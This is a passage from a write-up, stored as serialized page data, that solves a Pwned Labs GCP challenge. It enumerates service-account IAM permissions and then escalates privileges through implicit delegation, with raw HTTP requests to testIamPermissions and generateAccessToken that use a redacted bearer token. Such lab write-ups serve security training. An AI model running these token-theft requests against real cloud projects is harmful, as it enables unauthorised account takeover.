roles/owner\n",{"type":32,"tag":127,"props":1163,"children":1165},{"class":129,"line":1164},24,[1166,1170],{"type":32,"tag":127,"props":1167,"children":1168},{"style":134},[1169],{"type":37,"value":906},{"type":32,"tag":127,"props":1171,"children":1172},{"style":139},[1173],{"type":37,"value":911},{"type":32,"tag":127,"props":1175,"children":1177},{"class":129,"line":1176},25,[1178,1182],{"type":32,"tag":127,"props":1179,"children":1180},{"style":134},[1181],{"type":37,"value":919},{"type":32,"tag":127,"props":1183,"children":1184},{"style":139},[1185],{"type":37,"value":1110},{"type":32,"tag":127,"props":1187,"children":1189},{"class":129,"line":1188},26,[1190,1194],{"type":32,"tag":127,"props":1191,"children":1192},{"style":134},[1193],{"type":37,"value":932},{"type":32,"tag":127,"props":1195,"children":1196},{"style":139},[1197],{"type":37,"value":1198}," roles/run.invoker\n",{"type":32,"tag":127,"props":1200,"children":1202},{"class":129,"line":1201},27,[1203,1207],{"type":32,"tag":127,"props":1204,"children":1205},{"style":134},[1206],{"type":37,"value":906},{"type":32,"tag":127,"props":1208,"children":1209},{"style":139},[1210],{"type":37,"value":911},{"type":32,"tag":127,"props":1212,"children":1214},{"class":129,"line":1213},28,[1215,1219],{"type":32,"tag":127,"props":1216,"children":1217},{"style":134},[1218],{"type":37,"value":919},{"type":32,"tag":127,"props":1220,"children":1221},{"style":139},[1222],{"type":37,"value":1110},{"type":32,"tag":127,"props":1224,"children":1226},{"class":129,"line":1225},29,[1227,1231],{"type":32,"tag":127,"props":1228,"children":1229},{"style":134},[1230],{"type":37,"value":932},{"type":32,"tag":127,"props":1232,"children":1233},{"style":139},[1234],{"type":37,"value":1235}," 
roles/secretmanager.viewer\n",{"type":32,"tag":127,"props":1237,"children":1239},{"class":129,"line":1238},30,[1240,1244],{"type":32,"tag":127,"props":1241,"children":1242},{"style":134},[1243],{"type":37,"value":906},{"type":32,"tag":127,"props":1245,"children":1246},{"style":139},[1247],{"type":37,"value":911},{"type":32,"tag":127,"props":1249,"children":1251},{"class":129,"line":1250},31,[1252,1256],{"type":32,"tag":127,"props":1253,"children":1254},{"style":134},[1255],{"type":37,"value":919},{"type":32,"tag":127,"props":1257,"children":1258},{"style":139},[1259],{"type":37,"value":924},{"type":32,"tag":127,"props":1261,"children":1263},{"class":129,"line":1262},32,[1264,1268],{"type":32,"tag":127,"props":1265,"children":1266},{"style":134},[1267],{"type":37,"value":932},{"type":32,"tag":127,"props":1269,"children":1270},{"style":139},[1271],{"type":37,"value":1272}," roles/storage.bucketViewer\n",{"type":32,"tag":127,"props":1274,"children":1276},{"class":129,"line":1275},33,[1277,1281],{"type":32,"tag":127,"props":1278,"children":1279},{"style":134},[1280],{"type":37,"value":906},{"type":32,"tag":127,"props":1282,"children":1283},{"style":139},[1284],{"type":37,"value":911},{"type":32,"tag":127,"props":1286,"children":1288},{"class":129,"line":1287},34,[1289,1293],{"type":32,"tag":127,"props":1290,"children":1291},{"style":134},[1292],{"type":37,"value":919},{"type":32,"tag":127,"props":1294,"children":1295},{"style":139},[1296],{"type":37,"value":924},{"type":32,"tag":127,"props":1298,"children":1300},{"class":129,"line":1299},35,[1301,1305],{"type":32,"tag":127,"props":1302,"children":1303},{"style":134},[1304],{"type":37,"value":932},{"type":32,"tag":127,"props":1306,"children":1307},{"style":139},[1308],{"type":37,"value":1309}," 
roles/storage.objectViewer\n",{"type":32,"tag":127,"props":1311,"children":1313},{"class":129,"line":1312},36,[1314,1319],{"type":32,"tag":127,"props":1315,"children":1316},{"style":134},[1317],{"type":37,"value":1318},"etag:",{"type":32,"tag":127,"props":1320,"children":1321},{"style":139},[1322],{"type":37,"value":1323}," BwYxzfQaKR4=\n",{"type":32,"tag":127,"props":1325,"children":1327},{"class":129,"line":1326},37,[1328,1333],{"type":32,"tag":127,"props":1329,"children":1330},{"style":134},[1331],{"type":37,"value":1332},"version:",{"type":32,"tag":127,"props":1334,"children":1335},{"style":522},[1336],{"type":37,"value":1337}," 1\n",{"type":32,"tag":46,"props":1339,"children":1340},{},[1341],{"type":37,"value":1342},"From the command output, we have both the roles and the list of service accounts, this information is really important because it will allow us to list the actions that our current service account has on other service accounts.",{"type":32,"tag":46,"props":1344,"children":1345},{},[1346],{"type":37,"value":1347},"The permissions that are relevant in our case are the following:",{"type":32,"tag":238,"props":1349,"children":1350},{},[1351,1356,1361,1366],{"type":32,"tag":242,"props":1352,"children":1353},{},[1354],{"type":37,"value":1355},"iam.serviceAccounts.getAccessToken",{"type":32,"tag":242,"props":1357,"children":1358},{},[1359],{"type":37,"value":1360},"iam.serviceAccounts.signJwt",{"type":32,"tag":242,"props":1362,"children":1363},{},[1364],{"type":37,"value":1365},"iam.serviceAccounts.implicitDelegation",{"type":32,"tag":242,"props":1367,"children":1368},{},[1369],{"type":37,"value":1370},"iam.serviceAccounts.actAs",{"type":32,"tag":46,"props":1372,"children":1373},{},[1374],{"type":37,"value":1375},"Each of them allows us to elevate our privileges horizontally to another service account.",{"type":32,"tag":46,"props":1377,"children":1378},{},[1379],{"type":37,"value":1380},"To enumerate, we can use the GCP API which allows us to know the 
permissions our service account has in relation to the target service account:",{"type":32,"tag":238,"props":1382,"children":1383},{},[1384,1395,1406,1419],{"type":32,"tag":242,"props":1385,"children":1386},{},[1387,1389],{"type":37,"value":1388},"URL: ",{"type":32,"tag":104,"props":1390,"children":1392},{"className":1391},[],[1393],{"type":37,"value":1394},"https://iam.googleapis.com/v1/projects/-/serviceAccounts/\u003CTARGET_SA>:testIamPermissions",{"type":32,"tag":242,"props":1396,"children":1397},{},[1398,1400],{"type":37,"value":1399},"Method: ",{"type":32,"tag":104,"props":1401,"children":1403},{"className":1402},[],[1404],{"type":37,"value":1405},"POST",{"type":32,"tag":242,"props":1407,"children":1408},{},[1409,1411,1417],{"type":37,"value":1410},"Mandatory header: ",{"type":32,"tag":104,"props":1412,"children":1414},{"className":1413},[],[1415],{"type":37,"value":1416},"Authorization Bearer",{"type":37,"value":1418}," with the access token from our service account.",{"type":32,"tag":242,"props":1420,"children":1421},{},[1422],{"type":37,"value":1423},"Body:",{"type":32,"tag":113,"props":1425,"children":1426},{"lang":632},[1427],{"type":32,"tag":118,"props":1428,"children":1430},{"className":636,"code":1429,"language":632,"meta":7,"style":7},"{\n  \"permissions\": [\n    \"iam.serviceAccounts.getAccessToken\",\n    \"iam.serviceAccounts.signJwt\",\n    \"iam.serviceAccounts.implicitDelegation\",\n    \"iam.serviceAccounts.actAs\"\n  
]\n}\n",[1431],{"type":32,"tag":104,"props":1432,"children":1433},{"__ignoreMap":7},[1434,1441,1466,1485,1504,1523,1538,1546],{"type":32,"tag":127,"props":1435,"children":1436},{"class":129,"line":130},[1437],{"type":32,"tag":127,"props":1438,"children":1439},{"style":311},[1440],{"type":37,"value":649},{"type":32,"tag":127,"props":1442,"children":1443},{"class":129,"line":361},[1444,1448,1453,1457,1461],{"type":32,"tag":127,"props":1445,"children":1446},{"style":655},[1447],{"type":37,"value":658},{"type":32,"tag":127,"props":1449,"children":1450},{"style":436},[1451],{"type":37,"value":1452},"permissions",{"type":32,"tag":127,"props":1454,"children":1455},{"style":655},[1456],{"type":37,"value":668},{"type":32,"tag":127,"props":1458,"children":1459},{"style":311},[1460],{"type":37,"value":283},{"type":32,"tag":127,"props":1462,"children":1463},{"style":311},[1464],{"type":37,"value":1465}," [\n",{"type":32,"tag":127,"props":1467,"children":1468},{"class":129,"line":402},[1469,1473,1477,1481],{"type":32,"tag":127,"props":1470,"children":1471},{"style":675},[1472],{"type":37,"value":770},{"type":32,"tag":127,"props":1474,"children":1475},{"style":139},[1476],{"type":37,"value":1355},{"type":32,"tag":127,"props":1478,"children":1479},{"style":675},[1480],{"type":37,"value":668},{"type":32,"tag":127,"props":1482,"children":1483},{"style":311},[1484],{"type":37,"value":692},{"type":32,"tag":127,"props":1486,"children":1487},{"class":129,"line":738},[1488,1492,1496,1500],{"type":32,"tag":127,"props":1489,"children":1490},{"style":675},[1491],{"type":37,"value":770},{"type":32,"tag":127,"props":1493,"children":1494},{"style":139},[1495],{"type":37,"value":1360},{"type":32,"tag":127,"props":1497,"children":1498},{"style":675},[1499],{"type":37,"value":668},{"type":32,"tag":127,"props":1501,"children":1502},{"style":311},[1503],{"type":37,"value":692},{"type":32,"tag":127,"props":1505,"children":1506},{"class":129,"line":764},[1507,1511,1515,1519],{"type":32,"tag":127,"pro
ps":1508,"children":1509},{"style":675},[1510],{"type":37,"value":770},{"type":32,"tag":127,"props":1512,"children":1513},{"style":139},[1514],{"type":37,"value":1365},{"type":32,"tag":127,"props":1516,"children":1517},{"style":675},[1518],{"type":37,"value":668},{"type":32,"tag":127,"props":1520,"children":1521},{"style":311},[1522],{"type":37,"value":692},{"type":32,"tag":127,"props":1524,"children":1525},{"class":129,"line":803},[1526,1530,1534],{"type":32,"tag":127,"props":1527,"children":1528},{"style":675},[1529],{"type":37,"value":770},{"type":32,"tag":127,"props":1531,"children":1532},{"style":139},[1533],{"type":37,"value":1370},{"type":32,"tag":127,"props":1535,"children":1536},{"style":675},[1537],{"type":37,"value":835},{"type":32,"tag":127,"props":1539,"children":1540},{"class":129,"line":838},[1541],{"type":32,"tag":127,"props":1542,"children":1543},{"style":311},[1544],{"type":37,"value":1545},"  ]\n",{"type":32,"tag":127,"props":1547,"children":1548},{"class":129,"line":847},[1549],{"type":32,"tag":127,"props":1550,"children":1551},{"style":311},[1552],{"type":37,"value":853},{"type":32,"tag":46,"props":1554,"children":1555},{},[1556],{"type":37,"value":1557},"Here is an example of an HTTP request:",{"type":32,"tag":113,"props":1559,"children":1561},{"lang":1560},"http",[1562],{"type":32,"tag":118,"props":1563,"children":1566},{"className":1564,"code":1565,"language":1560,"meta":7,"style":7},"language-http shiki shiki-themes vitesse-dark","POST /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:testIamPermissions HTTP/2\nHost: iam.googleapis.com\nAuthorization: Bearer ya29.c.c0ASRK0GYygwCJiA5fIL05[..SNIP..]95utqtFJgtFu\nAccept: */*\nContent-Type: application/json\nContent-Length: 159\n\n{\n  \"permissions\": [\n    \"iam.serviceAccounts.getAccessToken\",\n    \"iam.serviceAccounts.signJwt\",\n    \"iam.serviceAccounts.implicitDelegation\",\n    \"iam.serviceAccounts.actAs\"\n    
]\n}\n",[1567],{"type":32,"tag":104,"props":1568,"children":1569},{"__ignoreMap":7},[1570,1583,1596,1609,1622,1635,1648,1655,1662,1685,1704,1723,1742,1757,1765],{"type":32,"tag":127,"props":1571,"children":1572},{"class":129,"line":130},[1573,1578],{"type":32,"tag":127,"props":1574,"children":1576},{"style":1575},"--shiki-default:#4D9375",[1577],{"type":37,"value":1405},{"type":32,"tag":127,"props":1579,"children":1580},{"style":322},[1581],{"type":37,"value":1582}," /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:testIamPermissions HTTP/2\n",{"type":32,"tag":127,"props":1584,"children":1585},{"class":129,"line":361},[1586,1591],{"type":32,"tag":127,"props":1587,"children":1588},{"style":1575},[1589],{"type":37,"value":1590},"Host:",{"type":32,"tag":127,"props":1592,"children":1593},{"style":139},[1594],{"type":37,"value":1595}," iam.googleapis.com\n",{"type":32,"tag":127,"props":1597,"children":1598},{"class":129,"line":402},[1599,1604],{"type":32,"tag":127,"props":1600,"children":1601},{"style":1575},[1602],{"type":37,"value":1603},"Authorization:",{"type":32,"tag":127,"props":1605,"children":1606},{"style":139},[1607],{"type":37,"value":1608}," Bearer ya29.c.c0ASRK0GYygwCJiA5fIL05[..SNIP..]95utqtFJgtFu\n",{"type":32,"tag":127,"props":1610,"children":1611},{"class":129,"line":738},[1612,1617],{"type":32,"tag":127,"props":1613,"children":1614},{"style":1575},[1615],{"type":37,"value":1616},"Accept:",{"type":32,"tag":127,"props":1618,"children":1619},{"style":139},[1620],{"type":37,"value":1621}," */*\n",{"type":32,"tag":127,"props":1623,"children":1624},{"class":129,"line":764},[1625,1630],{"type":32,"tag":127,"props":1626,"children":1627},{"style":1575},[1628],{"type":37,"value":1629},"Content-Type:",{"type":32,"tag":127,"props":1631,"children":1632},{"style":139},[1633],{"type":37,"value":1634}," 
application/json\n",{"type":32,"tag":127,"props":1636,"children":1637},{"class":129,"line":803},[1638,1643],{"type":32,"tag":127,"props":1639,"children":1640},{"style":1575},[1641],{"type":37,"value":1642},"Content-Length:",{"type":32,"tag":127,"props":1644,"children":1645},{"style":139},[1646],{"type":37,"value":1647}," 159\n",{"type":32,"tag":127,"props":1649,"children":1650},{"class":129,"line":838},[1651],{"type":32,"tag":127,"props":1652,"children":1653},{"emptyLinePlaceholder":895},[1654],{"type":37,"value":898},{"type":32,"tag":127,"props":1656,"children":1657},{"class":129,"line":847},[1658],{"type":32,"tag":127,"props":1659,"children":1660},{"style":311},[1661],{"type":37,"value":649},{"type":32,"tag":127,"props":1663,"children":1664},{"class":129,"line":975},[1665,1669,1673,1677,1681],{"type":32,"tag":127,"props":1666,"children":1667},{"style":655},[1668],{"type":37,"value":658},{"type":32,"tag":127,"props":1670,"children":1671},{"style":436},[1672],{"type":37,"value":1452},{"type":32,"tag":127,"props":1674,"children":1675},{"style":655},[1676],{"type":37,"value":668},{"type":32,"tag":127,"props":1678,"children":1679},{"style":311},[1680],{"type":37,"value":283},{"type":32,"tag":127,"props":1682,"children":1683},{"style":311},[1684],{"type":37,"value":1465},{"type":32,"tag":127,"props":1686,"children":1687},{"class":129,"line":987},[1688,1692,1696,1700],{"type":32,"tag":127,"props":1689,"children":1690},{"style":675},[1691],{"type":37,"value":770},{"type":32,"tag":127,"props":1693,"children":1694},{"style":139},[1695],{"type":37,"value":1355},{"type":32,"tag":127,"props":1697,"children":1698},{"style":675},[1699],{"type":37,"value":668},{"type":32,"tag":127,"props":1701,"children":1702},{"style":311},[1703],{"type":37,"value":692},{"type":32,"tag":127,"props":1705,"children":1706},{"class":129,"line":1000},[1707,1711,1715,1719],{"type":32,"tag":127,"props":1708,"children":1709},{"style":675},[1710],{"type":37,"value":770},{"type":32,"tag":127,"props":1712,
"children":1713},{"style":139},[1714],{"type":37,"value":1360},{"type":32,"tag":127,"props":1716,"children":1717},{"style":675},[1718],{"type":37,"value":668},{"type":32,"tag":127,"props":1720,"children":1721},{"style":311},[1722],{"type":37,"value":692},{"type":32,"tag":127,"props":1724,"children":1725},{"class":129,"line":1013},[1726,1730,1734,1738],{"type":32,"tag":127,"props":1727,"children":1728},{"style":675},[1729],{"type":37,"value":770},{"type":32,"tag":127,"props":1731,"children":1732},{"style":139},[1733],{"type":37,"value":1365},{"type":32,"tag":127,"props":1735,"children":1736},{"style":675},[1737],{"type":37,"value":668},{"type":32,"tag":127,"props":1739,"children":1740},{"style":311},[1741],{"type":37,"value":692},{"type":32,"tag":127,"props":1743,"children":1744},{"class":129,"line":1025},[1745,1749,1753],{"type":32,"tag":127,"props":1746,"children":1747},{"style":675},[1748],{"type":37,"value":770},{"type":32,"tag":127,"props":1750,"children":1751},{"style":139},[1752],{"type":37,"value":1370},{"type":32,"tag":127,"props":1754,"children":1755},{"style":675},[1756],{"type":37,"value":835},{"type":32,"tag":127,"props":1758,"children":1759},{"class":129,"line":1037},[1760],{"type":32,"tag":127,"props":1761,"children":1762},{"style":311},[1763],{"type":37,"value":1764},"    ]\n",{"type":32,"tag":127,"props":1766,"children":1767},{"class":129,"line":1050},[1768],{"type":32,"tag":127,"props":1769,"children":1770},{"style":311},[1771],{"type":37,"value":853},{"type":32,"tag":46,"props":1773,"children":1774},{},[1775],{"type":37,"value":1776},"The response will contain the permissions that our service account has on the target service account.",{"type":32,"tag":46,"props":1778,"children":1779},{},[1780],{"type":37,"value":1781},"You will need to go through each service account with this request to determine if our service account has one or several of these permissions on another service account. 
Personally, I use Burp's Intruder but it's possible to make a custom bash script or use ffuf.",{"type":32,"tag":74,"props":1783,"children":1785},{"imgSrc":1784,":width":77},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743699663/writeups/pwnedlabs-gcp-challenge/intruder-enum-perms.webp",[],{"type":32,"tag":46,"props":1787,"children":1788},{},[1789,1791,1797],{"type":37,"value":1790},"After our enumeration, we can see that one of the requests has a longer return size than the others and we can see that we have implicit delegation rights on the service account ",{"type":32,"tag":104,"props":1792,"children":1794},{"className":1793},[],[1795],{"type":37,"value":1796},"sql-424@gr-proj-4.iam.gserviceaccount.com",{"type":37,"value":214},{"type":32,"tag":74,"props":1799,"children":1801},{"imgSrc":1800},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743699775/writeups/pwnedlabs-gcp-challenge/result-intruder-enum-first.webp",[],{"type":32,"tag":46,"props":1803,"children":1804},{},[1805],{"type":37,"value":1806},"In the following chapter, we will detail the implicit delegation attack path to escalate our privileges horizontally.",{"type":32,"tag":39,"props":1808,"children":1810},{"id":1809},"implicit-delegation",[1811],{"type":37,"value":1812},"Implicit delegation",{"type":32,"tag":46,"props":1814,"children":1815},{},[1816,1818,1825],{"type":37,"value":1817},"Before we begin, I invite you to read the ",{"type":32,"tag":52,"props":1819,"children":1822},{"href":1820,"rel":1821},"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1",[56],[1823],{"type":37,"value":1824},"rhinosecurity article",{"type":37,"value":1826}," about privilege escalation methods on GCP, where a section is dedicated to implicit delegation.",{"type":32,"tag":46,"props":1828,"children":1829},{},[1830],{"type":37,"value":1831},"What does the privilege escalation scenario via implicit delegation permission consist 
of?",{"type":32,"tag":46,"props":1833,"children":1834},{},[1835,1837,1843,1845,1851],{"type":37,"value":1836},"Implicit delegation occurs when a service account A has ",{"type":32,"tag":104,"props":1838,"children":1840},{"className":1839},[],[1841],{"type":37,"value":1842},"implicitDelegation",{"type":37,"value":1844}," rights on a service account B which itself has ",{"type":32,"tag":104,"props":1846,"children":1848},{"className":1847},[],[1849],{"type":37,"value":1850},"getAccessToken",{"type":37,"value":1852}," rights on a service account C.",{"type":32,"tag":46,"props":1854,"children":1855},{},[1856],{"type":37,"value":1857},"So in our case we have this diagram:",{"type":32,"tag":74,"props":1859,"children":1862},{"imgSrc":1860,":width":1861},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743719479/writeups/pwnedlabs-gcp-challenge/implicit-delegation.webp","500",[],{"type":32,"tag":46,"props":1864,"children":1865},{},[1866],{"type":37,"value":1867},"To exploit this attack path, we will also go through the GCP API to get the access token of the service account 
C:",{"type":32,"tag":238,"props":1869,"children":1870},{},[1871,1881,1890,1900],{"type":32,"tag":242,"props":1872,"children":1873},{},[1874,1875],{"type":37,"value":1388},{"type":32,"tag":104,"props":1876,"children":1878},{"className":1877},[],[1879],{"type":37,"value":1880},"https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/\u003CTARGET_SA>:generateAccessToken",{"type":32,"tag":242,"props":1882,"children":1883},{},[1884,1885],{"type":37,"value":1399},{"type":32,"tag":104,"props":1886,"children":1888},{"className":1887},[],[1889],{"type":37,"value":1405},{"type":32,"tag":242,"props":1891,"children":1892},{},[1893,1894,1899],{"type":37,"value":1410},{"type":32,"tag":104,"props":1895,"children":1897},{"className":1896},[],[1898],{"type":37,"value":1416},{"type":37,"value":1418},{"type":32,"tag":242,"props":1901,"children":1902},{},[1903],{"type":37,"value":1423},{"type":32,"tag":113,"props":1905,"children":1906},{"lang":632},[1907],{"type":32,"tag":118,"props":1908,"children":1910},{"className":636,"code":1909,"language":632,"meta":7,"style":7},"{\n  \"delegates\": [\"projects/-/serviceAccounts/sql-424@gr-proj-4.iam.gserviceaccount.com\"],\n  \"scope\": [\"https://www.googleapis.com/auth/cloud-platform\"] 
\n}\n",[1911],{"type":32,"tag":104,"props":1912,"children":1913},{"__ignoreMap":7},[1914,1921,1962,2008],{"type":32,"tag":127,"props":1915,"children":1916},{"class":129,"line":130},[1917],{"type":32,"tag":127,"props":1918,"children":1919},{"style":311},[1920],{"type":37,"value":649},{"type":32,"tag":127,"props":1922,"children":1923},{"class":129,"line":361},[1924,1928,1933,1937,1941,1945,1949,1954,1958],{"type":32,"tag":127,"props":1925,"children":1926},{"style":655},[1927],{"type":37,"value":658},{"type":32,"tag":127,"props":1929,"children":1930},{"style":436},[1931],{"type":37,"value":1932},"delegates",{"type":32,"tag":127,"props":1934,"children":1935},{"style":655},[1936],{"type":37,"value":668},{"type":32,"tag":127,"props":1938,"children":1939},{"style":311},[1940],{"type":37,"value":283},{"type":32,"tag":127,"props":1942,"children":1943},{"style":311},[1944],{"type":37,"value":717},{"type":32,"tag":127,"props":1946,"children":1947},{"style":675},[1948],{"type":37,"value":668},{"type":32,"tag":127,"props":1950,"children":1951},{"style":139},[1952],{"type":37,"value":1953},"projects/-/serviceAccounts/sql-424@gr-proj-4.iam.gserviceaccount.com",{"type":32,"tag":127,"props":1955,"children":1956},{"style":675},[1957],{"type":37,"value":668},{"type":32,"tag":127,"props":1959,"children":1960},{"style":311},[1961],{"type":37,"value":735},{"type":32,"tag":127,"props":1963,"children":1964},{"class":129,"line":402},[1965,1969,1974,1978,1982,1986,1990,1995,1999,2003],{"type":32,"tag":127,"props":1966,"children":1967},{"style":655},[1968],{"type":37,"value":658},{"type":32,"tag":127,"props":1970,"children":1971},{"style":436},[1972],{"type":37,"value":1973},"scope",{"type":32,"tag":127,"props":1975,"children":1976},{"style":655},[1977],{"type":37,"value":668},{"type":32,"tag":127,"props":1979,"children":1980},{"style":311},[1981],{"type":37,"value":283},{"type":32,"tag":127,"props":1983,"children":1984},{"style":311},[1985],{"type":37,"value":717},{"type":32,"tag":127,"props
":1987,"children":1988},{"style":675},[1989],{"type":37,"value":668},{"type":32,"tag":127,"props":1991,"children":1992},{"style":139},[1993],{"type":37,"value":1994},"https://www.googleapis.com/auth/cloud-platform",{"type":32,"tag":127,"props":1996,"children":1997},{"style":675},[1998],{"type":37,"value":668},{"type":32,"tag":127,"props":2000,"children":2001},{"style":311},[2002],{"type":37,"value":353},{"type":32,"tag":127,"props":2004,"children":2005},{"style":322},[2006],{"type":37,"value":2007}," \n",{"type":32,"tag":127,"props":2009,"children":2010},{"class":129,"line":738},[2011],{"type":32,"tag":127,"props":2012,"children":2013},{"style":311},[2014],{"type":37,"value":853},{"type":32,"tag":46,"props":2016,"children":2017},{},[2018],{"type":37,"value":1557},{"type":32,"tag":113,"props":2020,"children":2021},{"lang":1560},[2022],{"type":32,"tag":118,"props":2023,"children":2025},{"className":1564,"code":2024,"language":1560,"meta":7,"style":7},"POST /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:generateAccessToken HTTP/2\nHost: iamcredentials.googleapis.com\nAuthorization: Bearer ya29.c.c0ASRK0GYygwCJiA5fIL05[..SNIP..]95utqtFJgtFu\nAccept: */*\nContent-Type: application/json\nContent-Length: 149\n\n{\n  \"delegates\":[\n    \"projects/-/serviceAccounts/sql-424@gr-proj-4.iam.gserviceaccount.com\"\n  ],\n  \"scope\": [\n    \"https://www.googleapis.com/auth/cloud-platform\"\n  ]\n}\n",[2026],{"type":32,"tag":104,"props":2027,"children":2028},{"__ignoreMap":7},[2029,2041,2053,2064,2075,2086,2098,2105,2112,2132,2147,2155,2178,2193,2200],{"type":32,"tag":127,"props":2030,"children":2031},{"class":129,"line":130},[2032,2036],{"type":32,"tag":127,"props":2033,"children":2034},{"style":1575},[2035],{"type":37,"value":1405},{"type":32,"tag":127,"props":2037,"children":2038},{"style":322},[2039],{"type":37,"value":2040}," /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:generateAccessToken 
HTTP/2\n",{"type":32,"tag":127,"props":2042,"children":2043},{"class":129,"line":361},[2044,2048],{"type":32,"tag":127,"props":2045,"children":2046},{"style":1575},[2047],{"type":37,"value":1590},{"type":32,"tag":127,"props":2049,"children":2050},{"style":139},[2051],{"type":37,"value":2052}," iamcredentials.googleapis.com\n",{"type":32,"tag":127,"props":2054,"children":2055},{"class":129,"line":402},[2056,2060],{"type":32,"tag":127,"props":2057,"children":2058},{"style":1575},[2059],{"type":37,"value":1603},{"type":32,"tag":127,"props":2061,"children":2062},{"style":139},[2063],{"type":37,"value":1608},{"type":32,"tag":127,"props":2065,"children":2066},{"class":129,"line":738},[2067,2071],{"type":32,"tag":127,"props":2068,"children":2069},{"style":1575},[2070],{"type":37,"value":1616},{"type":32,"tag":127,"props":2072,"children":2073},{"style":139},[2074],{"type":37,"value":1621},{"type":32,"tag":127,"props":2076,"children":2077},{"class":129,"line":764},[2078,2082],{"type":32,"tag":127,"props":2079,"children":2080},{"style":1575},[2081],{"type":37,"value":1629},{"type":32,"tag":127,"props":2083,"children":2084},{"style":139},[2085],{"type":37,"value":1634},{"type":32,"tag":127,"props":2087,"children":2088},{"class":129,"line":803},[2089,2093],{"type":32,"tag":127,"props":2090,"children":2091},{"style":1575},[2092],{"type":37,"value":1642},{"type":32,"tag":127,"props":2094,"children":2095},{"style":139},[2096],{"type":37,"value":2097}," 
149\n",{"type":32,"tag":127,"props":2099,"children":2100},{"class":129,"line":838},[2101],{"type":32,"tag":127,"props":2102,"children":2103},{"emptyLinePlaceholder":895},[2104],{"type":37,"value":898},{"type":32,"tag":127,"props":2106,"children":2107},{"class":129,"line":847},[2108],{"type":32,"tag":127,"props":2109,"children":2110},{"style":311},[2111],{"type":37,"value":649},{"type":32,"tag":127,"props":2113,"children":2114},{"class":129,"line":975},[2115,2119,2123,2127],{"type":32,"tag":127,"props":2116,"children":2117},{"style":655},[2118],{"type":37,"value":658},{"type":32,"tag":127,"props":2120,"children":2121},{"style":436},[2122],{"type":37,"value":1932},{"type":32,"tag":127,"props":2124,"children":2125},{"style":655},[2126],{"type":37,"value":668},{"type":32,"tag":127,"props":2128,"children":2129},{"style":311},[2130],{"type":37,"value":2131},":[\n",{"type":32,"tag":127,"props":2133,"children":2134},{"class":129,"line":987},[2135,2139,2143],{"type":32,"tag":127,"props":2136,"children":2137},{"style":675},[2138],{"type":37,"value":770},{"type":32,"tag":127,"props":2140,"children":2141},{"style":139},[2142],{"type":37,"value":1953},{"type":32,"tag":127,"props":2144,"children":2145},{"style":675},[2146],{"type":37,"value":835},{"type":32,"tag":127,"props":2148,"children":2149},{"class":129,"line":1000},[2150],{"type":32,"tag":127,"props":2151,"children":2152},{"style":311},[2153],{"type":37,"value":2154},"  
],\n",{"type":32,"tag":127,"props":2156,"children":2157},{"class":129,"line":1013},[2158,2162,2166,2170,2174],{"type":32,"tag":127,"props":2159,"children":2160},{"style":655},[2161],{"type":37,"value":658},{"type":32,"tag":127,"props":2163,"children":2164},{"style":436},[2165],{"type":37,"value":1973},{"type":32,"tag":127,"props":2167,"children":2168},{"style":655},[2169],{"type":37,"value":668},{"type":32,"tag":127,"props":2171,"children":2172},{"style":311},[2173],{"type":37,"value":283},{"type":32,"tag":127,"props":2175,"children":2176},{"style":311},[2177],{"type":37,"value":1465},{"type":32,"tag":127,"props":2179,"children":2180},{"class":129,"line":1025},[2181,2185,2189],{"type":32,"tag":127,"props":2182,"children":2183},{"style":675},[2184],{"type":37,"value":770},{"type":32,"tag":127,"props":2186,"children":2187},{"style":139},[2188],{"type":37,"value":1994},{"type":32,"tag":127,"props":2190,"children":2191},{"style":675},[2192],{"type":37,"value":835},{"type":32,"tag":127,"props":2194,"children":2195},{"class":129,"line":1037},[2196],{"type":32,"tag":127,"props":2197,"children":2198},{"style":311},[2199],{"type":37,"value":1545},{"type":32,"tag":127,"props":2201,"children":2202},{"class":129,"line":1050},[2203],{"type":32,"tag":127,"props":2204,"children":2205},{"style":311},[2206],{"type":37,"value":853},{"type":32,"tag":46,"props":2208,"children":2209},{},[2210],{"type":37,"value":2211},"The response will contain the access token of the service account C.",{"type":32,"tag":46,"props":2213,"children":2214},{},[2215,2217,2223],{"type":37,"value":2216},"In our case, we don't know if the ",{"type":32,"tag":104,"props":2218,"children":2220},{"className":2219},[],[2221],{"type":37,"value":2222},"sql-424",{"type":37,"value":2224}," service account has getAccessToken rights on another service account, similar to enumeration parts we will need to fuzz with the service accounts that we are 
targeting.",{"type":32,"tag":74,"props":2226,"children":2228},{"imgSrc":2227,":width":77},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743700878/writeups/pwnedlabs-gcp-challenge/implicit-delegation-intruder.webp",[],{"type":32,"tag":46,"props":2230,"children":2231},{},[2232,2234,2239,2241,2246,2248,2254],{"type":37,"value":2233},"After our fuzzing, we can see that the service account ",{"type":32,"tag":104,"props":2235,"children":2237},{"className":2236},[],[2238],{"type":37,"value":2222},{"type":37,"value":2240}," has the ",{"type":32,"tag":104,"props":2242,"children":2244},{"className":2243},[],[2245],{"type":37,"value":1850},{"type":37,"value":2247}," permission on the ",{"type":32,"tag":104,"props":2249,"children":2251},{"className":2250},[],[2252],{"type":37,"value":2253},"analytics",{"type":37,"value":2255}," service account, which allowed us to retrieve its token.",{"type":32,"tag":74,"props":2257,"children":2259},{"imgSrc":2258,":width":77},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743701439/writeups/pwnedlabs-gcp-challenge/intruder-implicit-delegation-result.webp",[],{"type":32,"tag":46,"props":2261,"children":2262},{},[2263],{"type":37,"value":2264},"Now that we have a service account, we can repeat the enumeration process by fuzzing the permissions that our service account has on other service accounts.",{"type":32,"tag":74,"props":2266,"children":2268},{"imgSrc":2267,":width":77},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743717471/writeups/pwnedlabs-gcp-challenge/result-intruder-enum-second.webp",[],{"type":32,"tag":46,"props":2270,"children":2271},{},[2272,2274,2279,2281,2287],{"type":37,"value":2273},"We can see that our new ",{"type":32,"tag":104,"props":2275,"children":2277},{"className":2276},[],[2278],{"type":37,"value":2253},{"type":37,"value":2280}," service account has signJwt permissions on the 
